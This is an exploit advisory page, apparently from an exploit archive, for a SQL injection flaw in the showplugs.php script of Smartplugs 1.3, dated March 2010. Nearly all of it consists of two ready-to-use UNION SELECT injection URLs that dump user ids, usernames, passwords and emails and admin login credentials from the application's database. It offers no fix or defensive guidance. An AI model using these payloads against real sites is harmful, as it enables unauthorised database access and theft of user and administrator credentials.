Home / os / winme

Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability

Posted on 03 March 2010

========================================================== Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability ========================================================== ----------------------------Information------------------------------------------------ +Name : smartplugs 1.3 SQL Injection showplugs.php +Autor : Easy Laster +Date : 03.03.2010 +Script : smartplugs 1.3 http://www.smart-plugs.com/spv1/ +Download : ------------- +Price : 170$ +Language : PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : www.site.com/smartplugs/showplugs.php?domain= +Exploitable users : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select +1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+ Exploitable admin : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+ select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+ ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP